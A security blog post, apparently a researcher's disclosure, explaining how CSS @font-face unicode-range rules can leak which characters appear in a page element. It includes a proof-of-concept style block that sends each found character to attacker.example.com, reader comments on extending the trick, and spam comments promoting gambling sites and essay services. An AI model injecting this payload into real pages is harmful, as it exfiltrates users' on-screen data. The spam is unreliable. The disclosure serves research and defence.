Using this technique, an attacker can read page's text partially by CSS only.
An attacker might use this technique in the following cases:
- Browser's XSS filter bypass (e.g. XSS Auditor does not block <style> injection)
- Only CSS injection is allowed in the target page
As far as I know, known CSS based attack can read attribute (See Attribute Reader: http://p42.us/css/) but can't read characters of text node. This vector can do it, not perfect though :)
So far, this vector can be used in Chrome and Firefox Nightly 44.
Let's go:
<style>
@font-face{
font-family:poc;
src: url(http://attacker.example.com/?A); /* fetched */
unicode-range:U+0041;
}
@font-face{
font-family:poc;
src: url(http://attacker.example.com/?B); /* fetched too */
unicode-range:U+0042;
}
@font-face{
font-family:poc;
src: url(http://attacker.example.com/?C); /* not fetched */
unicode-range:U+0043;
}
#sensitive-information{
font-family:poc;
}
</style>
<p id="sensitive-information">AB</p>
When you access this page, Chrome and Firefox fetch "?A" and "?B" because text node of sensitive-information contains "A" and "B" characters. But Chrome and Firefox do not fetch "?C" because it does not contain "C". This means that we have been able to read "A" and "B".
Let's see another example: http://vulnerabledoma.in/poc_unicode-range2.html
You can see external requests including page text (M,a,s,t,o,K,i,n,u,g,w) from DevTools. Like the following:
As you can see, we can't know duplicated characters. But in some cases like this PoC, I think that it can give an attacker enough information.
I reported this trick to Chrome Team but it has been marked WontFix on Issue 543078.
It seems that this behavior is spec'd. See EXAMPLE 13 of http://www.w3.org/TR/css3-fonts/#composite-fonts. Due to this behavior, users can save bandwidth. But as the side effect, an attacker got new attack vector.
This is a really interesting way to exploit that the browser will go through all specified fonts, even if it's a houndred and none exists, it's still a request made.
ReplyDeleteYou can easily use that for input fields, except the password type...
ReplyDeleteany work-around to make duplicated characters work?
ReplyDeleteIt could be possible to figure out character combinations using ligatures. I'm not sure if it's possible to make the requests to remote server for ligatures other than those defined as separate characters in UNICODE (in practice, only ff, ffi, fi).
ReplyDeleteCustom font could be used to make all character combinations different width or height and somehow try to leak the width or height of the element to remote server.
I don’t know whether it’s just me or if perhaps everyone else experiencing problems with your blog.
ReplyDelete섯다
It looks like some of the text within your posts are running off the screen. Can someone else please provide feedback and let me know if this is happening to them as well?
ReplyDeleteThis may be a issue with my browser because I’ve had
this happen previously. Cheers!
스포츠토토
Great writing to see, glad that google brought me here, Keep Up cool job!
ReplyDeleteIf you are going for best contents like I do, simply go to see this website all the time as it provides feature contents, thanks
한국야동
토토
ReplyDelete프로토
안전놀이터
Great write-up, I am a big believer in commenting on blogs to inform the blog writers know that they’ve added something worthwhile to the world wide web!..
스포츠중계
ReplyDelete스포츠토토티비
토토사이트
I would love to visit this website every day. As this promotes eternal knowledge.
토토
ReplyDelete배트맨토토
먹튀검증
Your article has proven very informative and very useful to me. It was very obvious that you are much knowledgeable in this area.
It's good to see you, need buy custom essays online ?! We have the best pricing policy on the market. We understand many students forgo many things to live within their budget. We do not intend to constrain it further, which is why our services are affordable. We want all our clients to buy essay papers cheap and achieve their academic goals.
ReplyDelete